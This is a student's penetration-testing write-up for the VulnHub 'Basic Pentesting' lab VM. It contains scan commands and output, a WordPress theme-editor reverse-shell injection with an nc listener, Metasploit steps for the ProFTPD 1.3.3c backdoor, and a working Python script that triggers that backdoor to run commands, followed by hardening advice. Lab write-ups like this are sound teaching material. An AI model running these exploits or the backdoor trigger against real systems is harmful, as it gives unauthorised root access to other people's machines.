Author: Chirag Khatri
Institution: Delhi Skill and Entrepreneurship University, Rajokri Campus
Branch: Computer Science
Project: Penetration Testing using Nmap and Metasploit
This project simulates a real-world attack scenario on a vulnerable virtual machine from VulnHub: Basic Pentesting. The goal is to identify vulnerabilities, exploit them, gain remote shell access, and escalate privileges to root.
The machine features multiple attack vectors and is intended for beginners to gain hands-on experience with reconnaissance, exploitation, and privilege escalation techniques.
- Kali Linux (VirtualBox)
- Nmap
- Netdiscover
- Nikto
- Enum4linux
- Metasploit (msfconsole)
- netcat (nc)
- WordPress reverse shell injection
netdiscover -r 192.168.122.0/24

Currently scanning: 192.168.122.0/24 | Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 120

IP               At MAC Address     Count  Len  MAC Vendor
-----------------------------------------------------------------
192.168.122.1    08:00:27:12:34:56  1      60   Oracle VirtualBox
192.168.122.144  08:00:27:AA:BB:CC  1      60   Oracle VirtualBox

Target identified: 192.168.122.144. Scans run against it, from a default-script/version scan to a full vuln-script scan:

nmap -sC -sV 192.168.122.144
nmap -sV -A 192.168.122.144
nmap -sV -A --script vuln 192.168.122.144

Output of the last scan:

root@kali:~# nmap -sV -A --script vuln 192.168.122.144
Starting Nmap 7.80SVN ( https://nmap.org ) at 2021-05-21 03:30 EDT
Nmap scan report for 192.168.122.144
Host is up (0.0033s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
| ftp-proftpd-backdoor:
|   This installation has been backdoored.
|   Command: id
|   Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
|_sslv2-drown:
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_  /secret/: Potentially interesting folder
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|     Description:
|       Slowloris tries to keep many connections to the target web server open
|       and hold them open as long as possible by sending partial requests.
|       This can cause Denial Of Service.
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:07:5F:C6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 3.29 ms 192.168.122.144
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 417.02 seconds

nikto -h http://192.168.122.144/

- /secret/ directory discovered by Nikto (Nmap's http-enum script had flagged the same folder)
- Added vtcsec to /etc/hosts, mapped to 192.168.122.144, so that the WordPress site under /secret/ can be reached at http://vtcsec/secret/
- Logged in to the WordPress admin panel using default credentials:
  admin:admin
- Navigated to: Appearance > Theme Editor > 404.php
- Injected a PHP reverse shell payload into 404.php, pointing back at the Kali listener on port 4444
- Listener started on Kali:
  nc -lvnp 4444
- Triggered the shell by requesting:
  http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php
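The Nmap scan earlier on this page was read by eye. The script below is an added example for this write-up (not code from the project, from Nmap or from Metasploit) showing how to turn Nmap's normal on-screen output (the same format `-oN` writes) into a findings list: parse_nmap_normal() extracts each open port with its service, version and the NSE script blocks attached to it, and findings() flags what a tester acts on first. SAMPLE_SCAN is a re-indented, abridged copy of the scan output shown above; the function and regex names are this example's own.

```python
"""Turn Nmap's normal (on-screen / -oN) output into a findings list.

Added example for this write-up, not project code. SAMPLE_SCAN is a
re-indented, abridged copy of the scan shown on the page.
"""
import re

# Port table row, e.g. "21/tcp open  ftp     ProFTPD 1.3.3c"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+([\w|]+)\s+(\S+)\s*(.*)$")
# Script start: "| name: ..." or "|_name: ..." (at most one space after the bar).
# Continuation lines are indented by two or more spaces, so they do not match.
SCRIPT_START_RE = re.compile(r"^\|(_?) ?([\w-]+):\s?(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")

SAMPLE_SCAN = """\
Nmap scan report for 192.168.122.144
Host is up (0.0033s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
| ftp-proftpd-backdoor:
|   This installation has been backdoored.
|   Command: id
|   Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
|_sslv2-drown:
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_  /secret/: Potentially interesting folder
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:07:5F:C6 (VMware)
"""


def parse_nmap_normal(text):
    """Map port number -> {proto, state, service, version, scripts: {name: [lines]}}."""
    ports, port, script = {}, None, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            num, proto, state, service, version = m.groups()
            port = int(num)
            ports[port] = {"proto": proto, "state": state, "service": service,
                           "version": version, "scripts": {}}
            script = None
            continue
        if port is None or not line.startswith("|"):
            port = script = None  # left the port table (MAC/OS lines, host scripts)
            continue
        m = SCRIPT_START_RE.match(line)
        if m:
            script = m.group(2)
            ports[port]["scripts"][script] = [m.group(3)] if m.group(3) else []
        elif script is not None:
            # continuation line: strip the "|", "|_" and indentation prefix
            ports[port]["scripts"][script].append(line.lstrip("|_ ").rstrip())
    return ports


def findings(ports):
    """Flag script results worth acting on: backdoor hits, VULNERABLE states
    (with CVE ids) and interesting web paths. Returns (port, severity, detail)."""
    out = []
    for port, info in sorted(ports.items()):
        for name, lines in info["scripts"].items():
            body = " ".join(lines)
            if name == "ftp-proftpd-backdoor" and "backdoored" in body:
                out.append((port, "critical", f"{name}: {body}"))
            elif "VULNERABLE" in body and "NOT VULNERABLE" not in body:
                cves = sorted(set(CVE_RE.findall(body))) or ["no CVE id"]
                out.append((port, "vuln", f"{name}: {', '.join(cves)}"))
            elif name == "http-enum":
                for entry in lines:
                    out.append((port, "info", f"{name}: {entry}"))
    return out


if __name__ == "__main__":
    for port, severity, detail in findings(parse_nmap_normal(SAMPLE_SCAN)):
        print(f"{port:>5}  {severity:<8} {detail}")
```

On the page's scan this yields three findings: the ProFTPD backdoor on 21/tcp (critical, with the uid=0 result), the /secret/ folder on 80/tcp (info) and the Slowloris check on 80/tcp (vuln, CVE-2007-6750). For anything beyond a single host, prefer `-oX` and a proper XML parser; the normal-output format is meant for people, not scripts.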
msfconsole
use exploit/unix/ftp/proftpd_133c_backdoor
set RHOSTS 192.168.122.144
run

whoami
id
uname -a

The backdoor shell runs as root directly (the ftp-proftpd-backdoor script output above already showed uid=0(root)), so no separate privilege escalation step was needed on this path.

✔ Flag captured from /root/.
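What the Nmap ftp-proftpd-backdoor script and the Metasploit proftpd_133c_backdoor module do on the wire is simple enough to show by hand. The script below is an added example for this write-up (not code from the project, from Nmap or from Metasploit): the trojaned ProFTPD 1.3.3c build spawned a root shell when it received the FTP command HELP ACIDBITCHEZ, and everything sent afterwards on the same connection was executed by that shell, which is why the Nmap output above shows "Command: id" answered with uid=0(root). check_proftpd_backdoor() sends the trigger followed by a command and decides from the reply whether a normal FTP daemon or a shell answered. FakeProftpd, run_demo() and the function names are this example's own; FakeProftpd is a constructed stand-in so the exchange can be demonstrated offline, with both a backdoored and a clean daemon.

```python
"""Wire-level check for the ProFTPD 1.3.3c backdoor.

Added example for this write-up, not code from the project, Nmap or
Metasploit. FakeProftpd is a constructed stand-in so the exchange can be
run offline against both a backdoored and a clean daemon.
"""
import socket
import threading

# The FTP command the trojaned 1.3.3c build reacted to by spawning /bin/sh as root.
BACKDOOR_TRIGGER = b"HELP ACIDBITCHEZ\r\n"


def _recv_until_quiet(sock, timeout):
    """Read until the peer closes or stays silent for `timeout` seconds."""
    sock.settimeout(timeout)
    chunks = []
    try:
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    except socket.timeout:
        pass
    return b"".join(chunks)


def check_proftpd_backdoor(host, port=21, command="id", timeout=2.0):
    """Return the backdoor shell's output for `command`, or None if the
    daemon behaves like a normal FTP server."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024)                 # "220 ProFTPD 1.3.3c Server ..."
        if not banner.startswith(b"220"):
            return None
        s.sendall(BACKDOOR_TRIGGER)           # hands the connection to /bin/sh if trojaned
        s.sendall(command.encode() + b"\n")   # executed by that shell
        reply = _recv_until_quiet(s, timeout).decode(errors="replace").strip()
    # A genuine daemon answers every line with a 3-digit FTP status code
    # (214/502 for HELP, 500 for "id"); the backdoor shell returns raw output.
    if not reply or reply[:3].isdigit():
        return None
    return reply


class FakeProftpd(threading.Thread):
    """Constructed stand-in for a ProFTPD control connection (offline demo)."""

    def __init__(self, backdoored):
        super().__init__(daemon=True)
        self.backdoored = backdoored
        self.listener = socket.socket()
        self.listener.bind(("127.0.0.1", 0))
        self.listener.listen(1)
        self.port = self.listener.getsockname()[1]

    def run(self):
        conn, _ = self.listener.accept()
        with conn, conn.makefile("rb") as lines:
            conn.sendall(b"220 ProFTPD 1.3.3c Server (Debian) [::ffff:127.0.0.1]\r\n")
            shell = False
            for raw in lines:
                line = raw.strip()
                if shell:                      # backdoor: /bin/sh running as root
                    if line == b"id":
                        conn.sendall(b"uid=0(root) gid=0(root) groups=0(root),65534(nogroup)\n")
                    else:
                        conn.sendall(b"sh: " + line + b": not found\n")
                elif self.backdoored and line.upper() == b"HELP ACIDBITCHEZ":
                    shell = True               # silent hand-off, no FTP reply at all
                elif line.upper().startswith(b"HELP"):
                    conn.sendall(b"214 Direct comments to root@localhost\r\n")
                else:
                    verb = line.split()[0].upper() if line else b""
                    conn.sendall(b"500 " + verb + b" not understood\r\n")
        self.listener.close()


def run_demo():
    """Start one backdoored and one clean fake daemon; return both verdicts."""
    results = []
    for backdoored in (True, False):
        srv = FakeProftpd(backdoored)
        srv.start()
        results.append(check_proftpd_backdoor("127.0.0.1", srv.port, timeout=1.0))
    return tuple(results)


if __name__ == "__main__":
    backdoored, clean = run_demo()
    print("backdoored daemon ->", backdoored)
    print("clean daemon      ->", clean)
```

The decision rule (does the reply start with a three-digit status code?) is deliberately narrow: a clean ProFTPD rejects both HELP ACIDBITCHEZ and the bare command with FTP status lines, while the backdoor shell echoes the command's raw output. Against a real target the check takes roughly one timeout period, because the shell keeps the connection open and the client has to wait for silence.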
- Practical use of enumeration and scanning tools like Nmap, Nikto, Enum4linux
- How weak web applications and services (WordPress, ProFTPD) are exploited
- Privilege escalation: a backdoored network service can hand over root directly, whereas a web-shell foothold such as the WordPress one normally needs a separate local escalation step
- Patch or reinstall vulnerable software. ProFTPD 1.3.3c was not buggy by itself: the backdoor came from a trojaned source tarball, so verify PGP signatures or published checksums before installing, rebuild the affected package from a trusted source, and treat a host that served the backdoor as fully compromised (it gave out a root shell)
- Disable unused services
- Use strong, unique credentials (avoid admin:admin) and rate-limit the WordPress login
- Protect web apps with a WAF, restrict access to sensitive directories such as /secret/, and disable the built-in theme/plugin editor (DISALLOW_FILE_EDIT in wp-config.php) so that an admin login cannot be turned into code execution as easily
- Apache was flagged as likely vulnerable to Slowloris (CVE-2007-6750): enable mod_reqtimeout and connection limits
⚠️ This project was conducted in a closed lab environment. For educational purposes only.